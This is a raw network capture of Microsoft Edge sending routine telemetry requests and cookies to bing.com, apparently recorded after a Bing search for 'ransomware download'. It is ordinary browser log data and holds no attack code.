cookie: BCP=AD=0&AL=0&SM=0
cookie: ipv6=hit=1709224310374&t=4
ResponseHTTP/2.0 204
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 1EC8724FE90644068D26F7FADE8BCDBE Ref B: LTSEDGE1006 Ref C: 2024-02-29T15:32:09Z
date: Thu, 29 Feb 2024 15:32:09 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220729.b31cbdb
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220723552%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220724484%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%5Dmsedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220723552%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220724484%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709&WTS=63844817508
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: BCP=AD=0&AL=0&SM=0
cookie: ipv6=hit=1709224310374&t=4
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: DF14288C67094C76BAF0D2D7C377F049 Ref B: LON04EDGE1110 Ref C: 2024-02-29T15:32:09Z
content-length: 0
date: Thu, 29 Feb 2024 15:32:09 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220729.b31cf69
-
Remote address:92.123.128.152:443RequestPOST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 701
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
content-type: text/xml
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709&WTS=63844817508
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: BCP=AD=0&AL=0&SM=0
cookie: ipv6=hit=1709224310374&t=4
ResponseHTTP/2.0 204
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: D3C37AE62CE24B8D9E2269672E97A8E0 Ref B: LTSEDGE2018 Ref C: 2024-02-29T15:32:11Z
date: Thu, 29 Feb 2024 15:32:11 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220731.b31de20
-
Remote address:92.123.128.152:443RequestPOST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 670
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
content-type: text/xml
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709&WTS=63844817508
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: BCP=AD=0&AL=0&SM=0
cookie: ipv6=hit=1709224310374&t=4
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 80D595C688A8498292136A2CB883116D Ref B: LTSEDGE1411 Ref C: 2024-02-29T15:32:11Z
content-length: 0
date: Thu, 29 Feb 2024 15:32:11 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220731.b31e0dc
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220725533%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%5Dmsedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220725533%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709&WTS=63844817508
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: BCP=AD=0&AL=0&SM=0
cookie: ipv6=hit=1709224310374&t=4
ResponseHTTP/2.0 204
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 61802BB70E0F46EB99976942CBBCC6D2 Ref B: LTSEDGE1411 Ref C: 2024-02-29T15:32:12Z
date: Thu, 29 Feb 2024 15:32:12 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220732.b31e99b
-
Remote address:92.123.128.152:443RequestPOST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 653
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
content-type: text/xml
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709&WTS=63844817508
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: BCP=AD=0&AL=0&SM=0
cookie: ipv6=hit=1709224310374&t=4
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: CEAFA2E495E649ADB236592571BF82BE Ref B: LTSEDGE1411 Ref C: 2024-02-29T15:32:13Z
content-length: 0
date: Thu, 29 Feb 2024 15:32:13 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220733.b31f1be
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220727612%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%5Dmsedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220727612%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709&WTS=63844817508
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: BCP=AD=0&AL=0&SM=0
cookie: ipv6=hit=1709224310374&t=4
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 9787D321C3784554BF84964D4A47D59F Ref B: LTSEDGE1411 Ref C: 2024-02-29T15:32:15Z
content-length: 0
date: Thu, 29 Feb 2024 15:32:15 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220735.b3201a6
-
Remote address:92.123.128.152:443RequestPOST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 669
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
content-type: text/xml
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709&WTS=63844817508
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: BCP=AD=0&AL=0&SM=0
cookie: ipv6=hit=1709224310374&t=4
ResponseHTTP/2.0 204
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: BBD192D98BCA45D28AF2A85EFB7CAC18 Ref B: LON04EDGE0811 Ref C: 2024-02-29T15:32:15Z
date: Thu, 29 Feb 2024 15:32:15 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220735.b3201ae
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220729080%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220730398%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%5Dmsedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220729080%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.ClientInst%22%2C%22TS%22%3A1709220730398%2C%22Name%22%3A%22CheckScrollCalled%22%2C%22FID%22%3A%22Codex%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1&HV=1709220709&WTS=63844817508
cookie: USRLOC=HS=1&BLOCK=TS=240229153151
cookie: BCP=AD=0&AL=0&SM=0
cookie: ipv6=hit=1709224310374&t=4
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: A1ABF1C82D7F4A4EB231EAB936C9D2BB Ref B: LTSEDGE1612 Ref C: 2024-02-29T15:32:17Z
content-length: 0
date: Thu, 29 Feb 2024 15:32:17 GMT
alt-svc: h3=":443"; ma=93600
